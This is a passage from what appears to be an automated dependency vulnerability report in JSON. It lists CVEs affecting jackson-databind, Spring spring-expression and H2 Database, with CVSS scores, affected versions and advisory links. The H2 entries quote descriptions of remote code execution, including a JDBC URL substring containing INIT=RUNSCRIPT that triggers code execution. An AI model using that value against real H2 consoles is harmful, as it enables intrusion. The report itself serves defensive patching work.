cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11111/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36186"]}],"cve":"CVE-2020-36186","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-11-19T20:13:06","ids":[{"system_name":"CVE Record","text":"CVE-2020-36186"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization 
gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36186"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36186"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36186/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36189"]}],"cve":"CVE-2020-36189","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:59","ids":[{"system_name":"CVE Record","text":"CVE-2020-36189"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 an 2.6.7.5 mishandles the interaction between serialization 
gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36189"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36189"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36189/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35490"]}],"cve":"CVE-2020-35490","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:00","ids":[{"system_name":"CVE Record","text":"CVE-2020-35490"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210122-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Serialization gadgets exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadgets exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between 
serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35490"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35490"},{"summary":"NetApp Advisory ntap-20210122-0005","url":"https://security.netapp.com/advisory/ntap-20210122-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35490/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-22950"]}],"cve":"CVE-2022-22950","cwe":{"id":"770","name":"Allocation of Resources Without Limits or Throttling"},"discovery_date":"2022-04-03T00:01:00","ids":[{"system_name":"CVE Record","text":"CVE-2022-22950"},{"system_name":"Vmware Advisory","text":"cve-2022-22950"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Allocation of Resources Without Limits or Throttling in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Allocation of Resources Without Limits or Throttling in Spring Framework In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0.RELEASE - 5.2.19.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service 
condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22950"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22950"},{"summary":"Vmware Advisory cve-2022-22950","url":"https://tanzu.vmware.com/security/cve-2022-22950"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22950/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"cve":"CVE-2023-20861","cwe":{"id":"917","name":"Improper Neutralization of Special Elements used in an Expression Language Statement"},"discovery_date":"2023-03-23T21:30:19","ids":[{"system_name":"CVE Record","text":"CVE-2023-20861"},{"system_name":"NetApp Advisory","text":"ntap-20230420-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Framework vulnerable to denial of service via specially crafted SpEL expression"},{"category":"details","details":"Vulnerability Details","text":"# Spring Framework vulnerable to denial of service via specially crafted SpEL expression In Spring Framework versions 6.0.0 - 6.0.6, 
5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20861"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20861"},{"summary":"NetApp Advisory ntap-20230420-0007","url":"https://security.netapp.com/advisory/ntap-20230420-0007"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20861"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2023-20861/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-20863"]}],"cve":"CVE-2023-20863","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-04-13T21:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2023-20863"},{"system_name":"NetApp 
Advisory","text":"ntap-20240524-0015"}],"notes":[{"audience":"developers","category":"other","text":"Allocation of Resources Without Limits or Throttling","title":"Additional CWE: 770"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Spring Framework vulnerable to denial of service"},{"category":"details","details":"Vulnerability Details","text":"# Spring Framework vulnerable to denial of service In Spring Framework versions prior to 5.2.24.release+ , 5.3.27+ and 6.0.8+ , it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) expression that may cause a denial-of-service (DoS) condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20863"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20863"},{"summary":"NetApp Advisory ntap-20240524-0015","url":"https://security.netapp.com/advisory/ntap-20240524-0015"},{"summary":"Cve 
2023","url":"https://spring.io/security/cve-2023-20863"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2023-20863/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45868"]}],"cve":"CVE-2022-45868","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2022-11-23T21:30:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-45868"},{"system_name":"GitHub Advisory","text":"GHSA-22wj-vf5f-wrvj"},{"system_name":"Google Advisory","text":"sonatype-2022-6243"}],"notes":[{"audience":"developers","category":"other","text":"Cleartext Storage of Sensitive Information","title":"Additional CWE: 312"},{"category":"description","details":"Vulnerability Description","text":"Password exposure in H2 Database "},{"category":"details","details":"Vulnerability Details","text":"# Password exposure in H2 Database The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. 
Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states \"This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that.\""}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.4.198|<2.2.220"],"known_not_affected":["com.h2database/h2@2.2.220"]},"references":[{"summary":"GitHub Advisory GHSA-22wj-vf5f-wrvj","url":"https://github.com/advisories/GHSA-22wj-vf5f-wrvj"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45868"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45868"},{"summary":"Google Advisory sonatype-2022-6243","url":"https://sites.google.com/sonatype.com/vulnerabilities/sonatype-2022-6243"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.4.198|<2.2.220"]}],"title":"CVE-2022-45868/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-23221"]}],"cve":"CVE-2022-23221","cwe":{"id":"88","name":"Improper Neutralization of Argument Delimiters in a 
Command"},"discovery_date":"2022-01-21T23:07:39","ids":[{"system_name":"Twitter Advisory","text":"1483824727936450564"},{"system_name":"CVE Record","text":"CVE-2022-23221"},{"system_name":"GitHub Advisory","text":"advisories"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5076"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0011"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Arbitrary code execution in H2 Console"},{"category":"details","details":"Vulnerability Details","text":"# Arbitrary code execution in H2 Console H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392."}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.0.57|<=2.0.206"],"known_not_affected":["com.h2database/h2@2.1.210"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jan/39"},{"summary":"GitHub Advisory advisories","url":"https://github.com/h2database/h2database/security/advisories"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23221"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23221"},{"summary":"NetApp Advisory ntap-20230818-0011","url":"https://security.netapp.com/advisory/ntap-20230818-0011"},{"summary":"Twitter Advisory 1483824727936450564","url":"https://twitter.com/d0nkey_man/status/1483824727936450564"},{"summary":"Debian Advisory 
dsa-5076","url":"https://www.debian.org/security/2022/dsa-5076"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.0.57|<=2.0.206"]}],"title":"CVE-2022-23221/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23463"]}],"cve":"CVE-2021-23463","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2021-12-16T14:29:57","ids":[{"system_name":"CVE Record","text":"CVE-2021-23463"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMH2DATABASE-1769238"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0010"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of XML External Entity Reference in com.h2database:h2."},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of XML External Entity Reference in com.h2database:h2. H2 is an embeddable RDBMS written in Java. 
The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability. ## Related CVE(s) CVE-2021-23463, SNYK-JAVA-COMH2DATABASE-1769238"}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.4.198|<2.0.202"],"known_not_affected":["com.h2database/h2@2.0.202"]},"references":[{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23463"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23463"},{"summary":"NetApp Advisory ntap-20230818-0010","url":"https://security.netapp.com/advisory/ntap-20230818-0010"},{"summary":"Snyk Advisory SNYK-JAVA-COMH2DATABASE-1769238","url":"https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.4.198|<2.0.202"]}],"title":"CVE-2021-23463/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-42392"]}],"cve":"CVE-2021-42392","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-01-06T23:55:09","ids":[{"system_name":"CVE Record","text":"CVE-2021-42392"},{"system_name":"GitHub Advisory","text":"GHSA-h376-j262-vhq6"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Debian Advisory","text":"dsa-5076"},{"system_name":"Secpod Advisory","text":"log4shell-critical-remote-code-execution-vulnerability-in-h2database-console"},{"system_name":"NetApp Advisory","text":"ntap-20220119-0001"},{"system_name":"JFrog Advisory","text":"the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"RCE in H2 Console"},{"category":"details","details":"Vulnerability Details","text":"# RCE in H2 Console ### Impact H2 Console in versions since 1.1.100 (2008-10-14) to 2.0.204 (2021-12-21) inclusive allows loading of custom classes from 
remote servers through JNDI. H2 Console doesn't accept remote connections by default. If remote access was enabled explicitly and some protection method (such as security constraint) wasn't set, an intruder can load own custom class and execute its code in a process with H2 Console (H2 Server process or a web server with H2 Console servlet). It is also possible to load them by creation a linked table in these versions, but it requires `ADMIN` privileges and user with `ADMIN` privileges has full access to the Java process by design. These privileges should never be granted to untrusted users. ### Patches Since version 2.0.206 H2 Console and linked tables explicitly forbid attempts to specify LDAP URLs for JNDI. Only local data sources can be used. ### Workarounds H2 Console should never be available to untrusted users. `-webAllowOthers` is a dangerous setting that should be avoided. H2 Console Servlet deployed on a web server can be protected with a security constraint: https://h2database.com/html/tutorial.html#usingH2ConsoleServlet If `webAllowOthers` is specified, you need to uncomment and edit `` and `` as necessary. See documentation of your web server for more details. 
### References This issue was found and privately reported to H2 team by [JFrog Security](https://www.jfrog.com/)'s vulnerability research team with detailed information."}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.1.100|<2.0.206"],"known_not_affected":["com.h2database/h2@2.0.206"]},"references":[{"summary":"GitHub Advisory GHSA-h376-j262-vhq6","url":"https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6"},{"summary":"JFrog Advisory the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console","url":"https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42392"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42392"},{"summary":"NetApp Advisory ntap-20220119-0001","url":"https://security.netapp.com/advisory/ntap-20220119-0001"},{"summary":"Debian Advisory dsa-5076","url":"https://www.debian.org/security/2022/dsa-5076"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Secpod Advisory 
